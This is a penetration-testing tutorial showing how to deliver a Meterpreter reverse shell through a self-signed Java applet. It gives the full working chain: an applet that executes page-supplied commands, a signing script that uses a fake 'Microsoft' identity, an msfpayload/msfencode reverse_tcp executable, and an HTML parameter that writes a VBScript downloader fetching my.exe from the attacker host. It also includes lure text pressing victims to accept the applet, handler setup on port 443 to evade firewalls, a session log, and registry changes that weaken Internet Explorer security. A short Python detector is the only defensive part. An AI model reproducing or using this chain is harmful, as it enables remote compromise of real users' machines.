Java Applet Infection
Joshua Abraham (jabra) published a great article, based on a talk given at the Infosec World Conference with Rafal Los, which can be found at http://blog.spl0it.org. Essentially, what the two were able to do is build a Java applet that, once executed in a browser, will allow us to execute a Meterpreter payload if the target accepts the security warning. Before we dive into this, we need to meet some prerequisites on our attacker's machine.
root@bt4:/# apt-get install sun-java6-jdk
Jabra has simplified most of the process with the bash script below to reduce input errors. You can download this script at: http://spl0it.org/files/makeapplet.sh
#!/bin/bash
#
# Shell script to sign a Java Applet
# Joshua "Jabra" Abraham <jabra@spl0it.org>
# Tue Jun 30 02:26:36 EDT 2009
#
# 1. Compile the Applet source code to an executable class.
#
# javac HelloWorld.java
#
# 2. Package the compiled class into a JAR file.
#
# jar cvf HelloWorld.jar HelloWorld.class
#
# 3. Generate key pairs.
#
# keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
#
# 4. Sign the JAR file.
#
# jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedHelloWorld.jar HelloWorld.jar signapplet
#
# 5. Export the public key certificate.
#
# keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
#
# 6. Deploy the JAR and the class file.
#
# <applet code="HelloWorld.class" archive="SignedHelloWorld.jar" width=1 height=1> </applet>
#
echo "Enter the name of the applet without the extension:"
read NAME
javac $NAME.java
if [ $? -eq 1 ] ; then
echo "Error with javac"
exit
fi
echo "[+] Packaging the compiled class into a JAR file"
jar cf $NAME.jar $NAME.class
if [ $? -eq 1 ] ; then
echo "Error with jar"
exit
fi
echo "[+] Generating key pairs"
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
if [ $? -eq 1 ] ; then
echo "Error with generating the key pair"
exit
fi
echo "[+] Signing the JAR file"
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar "Signed$NAME.jar" $NAME.jar signapplet
if [ $? -eq 1 ] ; then
echo "Error with signing the jar"
exit
fi
echo "[+] Exporting the public key certificate"
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
if [ $? -eq 1 ] ; then
echo "Error with exporting the public key"
exit
fi
echo "[+] Done"
sleep 1
echo ""
echo ""
echo "Deploy the JAR and certificate files. They should be deployed to a directory on a Web server."
echo ""
echo "<applet width='1' height='1' code='$NAME.class' archive='Signed$NAME.jar'> "
echo ""
We will now make a working directory in which to store this file, then either grab it from his site or copy and paste it into your favorite text editor.
root@bt4:/# mkdir ./java-applet
root@bt4:/# cd ./java-applet
We need to make a Java applet which we will then sign. For this, copy and paste the text below into your favorite text editor and save it as "MSFcmd.java". For the remainder of this module, leave your editor open, as you will need to modify some parameters as we go along.
import java.applet.*;
import java.awt.*;
import java.io.*;

public class MSFcmd extends Applet {
    public void init() {
        // Read the command string supplied by the <param name='first'> tag in the page.
        String first = getParameter("first");
        try {
            // Execute the parameter's value (the original passed the literal string "first").
            Process f = Runtime.getRuntime().exec(first);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Next, we will use Jabra's shell script to aid us in making our certificate. The following commands download the script, make it executable, and then launch it to produce the certs.
root@bt4:/java-applet/# wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh
root@bt4:/java-applet/# ./makeapplet.sh
Enter the name of the applet without the extension: MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name? [Unknown]: MSFcmd
What is the name of your organizational unit? [Unknown]: Microsoft
What is the name of your organization? [Unknown]: Microsoft Organization
What is the name of your City or Locality? [Unknown]: Redmond
What is the name of your State or Province? [Unknown]: Washington
What is the two-letter country code for this unit? [Unknown]: US
Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=US correct? [no]: yes
[+] Signing the JAR file
Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done
Now that everything is setup for us, we need to deploy the JAR and the class file.
root@bt4:/java-applet/# cp SignedMSFcmd.jar /var/www/
root@bt4:/java-applet/# cp MSFcmd.class /var/www/
root@bt4:/java-applet/# apache2ctl start
Now that the applet is deployed, we will have to create a Meterpreter payload. Change 'X.X.X.X' in the examples below to match your attacker's IP address. This command uses msfpayload to create a reverse TCP Meterpreter shell from our victim. We generate this payload in raw format and pipe it into msfencode, saving the payload as an executable. The executable is then copied to our web root directory and made executable.
root@bt4:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | ./msfencode -t exe -o my.exe
root@bt4:/pentest/exploits/framework3/# cp ./my.exe /var/www/
root@bt4:/pentest/exploits/framework3/# chmod a+x /var/www/my.exe
Now we need to add a command to our index.html file which will allow the client to download and execute our payload. Basically, this page will launch a Java applet signed by ourselves which, when given permission by the client, will call cmd.exe on their system, echoing lines into a vbs script named "apsou.vbs". Be forewarned that this file can be found on the system after all successful and "some" failed attempts. After this file is created, the same command string launches the vbs script and feeds it a variable: the attacker's link to the payload "my.exe". Once the payload has been downloaded, it will execute my.exe with that user's permissions.
We need to modify our index.html page which our clients will view. In a real world scenario, a pentester might try adding some video, web browser games, or other activities to distract or entertain the victim. Clever trickery such as Social Engineering can greatly benefit this type of attack by directing your targets to a specific URL and telling them to accept the security warning to continue viewing your site or use your "Custom Secure IM applet". You can also have different payloads in different folders waiting for different clients.
Enter the command below as one continuous line and be sure to change 'X.X.X.X' to your attacking IP address.
root@bt4:/pentest/exploits/framework3/# echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" > /var/www/index.html
root@bt4:/pentest/exploits/framework3/# echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe'> </applet>" >> /var/www/index.html
We will also add a message prompting the user to accept our malicious applet.
root@bt4:/pentest/exploits/framework3/# echo "" >> /var/www/index.html
root@bt4:/pentest/exploits/framework3/# echo "Please wait. We appreciate your business. This process may take a while." >> /var/www/index.html
root@bt4:/pentest/exploits/framework3/# echo "To view this page properly you must accept and run the applet.
We are sorry for any inconvenience. " >> /var/www/index.html
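From the defender's side, the chain built into index.html above (Java plugin spawning cmd.exe, a .vbs echoed into C:\windows, the ADODB.Stream/WinHttpRequest download primitive, and my.exe started from C:\windows) leaves a distinctive process-creation trail. The following Python is an added example, not part of the original module; the pipe-delimited log format and its field names are an assumption, and the sample records are constructed.

```python
import re
from typing import List, NamedTuple, Tuple

class ProcEvent(NamedTuple):
    """One process-creation record (Sysmon Event ID 1 style; the field set is an assumption)."""
    pid: int
    image: str
    parent_image: str
    command_line: str

# Constructed sample log: a benign plugin start, the dropper chain, and a benign cmd.exe.
SAMPLE_LOG = r"""
1256|C:\Program Files\Java\jre6\bin\java.exe|C:\Program Files\Internet Explorer\iexplore.exe|java.exe -Djava.class.path=SignedMSFcmd.jar
2301|C:\WINDOWS\system32\cmd.exe|C:\Program Files\Java\jre6\bin\java.exe|cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe
2350|C:\WINDOWS\system32\wscript.exe|C:\WINDOWS\system32\cmd.exe|"C:\WINDOWS\system32\wscript.exe" C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe
2412|C:\windows\my.exe|C:\WINDOWS\system32\wscript.exe|C:\windows\my.exe
2500|C:\WINDOWS\system32\cmd.exe|C:\WINDOWS\Explorer.EXE|cmd.exe /c dir
"""

def parse_events(text: str) -> List[ProcEvent]:
    """Parse the constructed pipe-delimited format: pid|image|parent_image|command_line."""
    events = []
    for line in text.splitlines():
        if line.strip():
            pid, image, parent, cmdline = line.split("|", 3)
            events.append(ProcEvent(int(pid), image, parent, cmdline))
    return events

SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
WSH = {"wscript.exe", "cscript.exe"}

def basename(path: str) -> str:
    return path.strip('"').lower().rsplit("\\", 1)[-1]

def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule) hits for the applet -> cmd.exe -> VBScript -> dropped EXE chain."""
    hits = []
    for ev in events:
        img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line.lower()
        if parent == "java.exe" and img in SCRIPT_HOSTS:  # the plugin should never spawn a shell
            hits.append((ev.pid, "java-plugin-spawned-script-host"))
        if re.search(r">\s*c:\\windows\\[^\s&]+\.vbs", cl):  # script assembled via echo redirects
            hits.append((ev.pid, "vbs-written-under-windows-dir"))
        if "adodb.stream" in cl and "winhttp.winhttprequest" in cl:  # download-to-disk primitive
            hits.append((ev.pid, "vbs-download-to-file-primitive"))
        if img in WSH and re.search(r"\.vbs\b.*https?://", cl):  # script host handed a URL
            hits.append((ev.pid, "script-host-given-url-argument"))
        if parent in WSH and re.fullmatch(r"c:\\windows\\[^\\]+\.exe", ev.image.lower()):
            hits.append((ev.pid, "exe-in-windows-root-started-by-script-host"))
    return hits
```

Any PID with two or more hits is the dropper chain; a single hit on a rule like the URL argument is worth a look but not conclusive on its own.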
We now need to set up the Metasploit multi/handler to listen for connection attempts from the clients. We will be listening for a reverse shell from the target on port 443. This port is associated with HTTPS traffic, and most organizations' firewalls permit this traffic to leave their networks. As before, change 'X.X.X.X' to your attacker's IP address.
msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST X.X.X.X
LHOST => X.X.X.X
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > save
Saved configuration to: /root/.msf3/config
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler...
When a victim browses to our website and accepts the security warning, the Meterpreter payload runs and connects back to our handler.
msf exploit(handler) >
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (A.A.A.A:443 -> T.T.T.T:44477)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
204 jusched.exe C:\ProgramFiles\Java\jre6\bin\jusched.exe
288 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
744 smss.exe \SystemRoot\System32\smss.exe
912 winlogon.exe C:\WINDOWS\system32\winlogon.exe
972 services.exe C:\WINDOWS\system32\services.exe
984 lsass.exe C:\WINDOWS\system32\lsass.exe
1176 svchost.exe C:\WINDOWS\system32\svchost.exe
1256 java.exe C:\Program Files\Java\jre6\bin\java.exe
1360 svchost.exe C:\WINDOWS\System32\svchost.exe
1640 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1712 Explorer.EXE C:\WINDOWS\Explorer.EXE
1872 jqs.exe C:\Program Files\Java\jre6\bin\jqs.exe
2412 my.exe C:\windows\my.exe
3052 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
meterpreter >
As a final note, if you have trouble gaining access, ensure that the files 'C:\windows\apsou.vbs' and 'C:\windows\my.exe' DO NOT exist on your target. If you attempt to re-exploit this client while they are present, the vbs script will not launch properly.
If you are still experiencing problems and you have confirmed the files above are not on the system, check the following locations in the registry and make changes as needed.
Start > Run: regedit, then navigate to:
HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
change the value to: 0
navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
select Decimal and change the value to 3
navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\
create a new DWORD named 1C00 with the hex value 10000
navigate to:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
select Decimal and change the value to 3
Now close regedit and start or restart IE, and the new settings should apply.

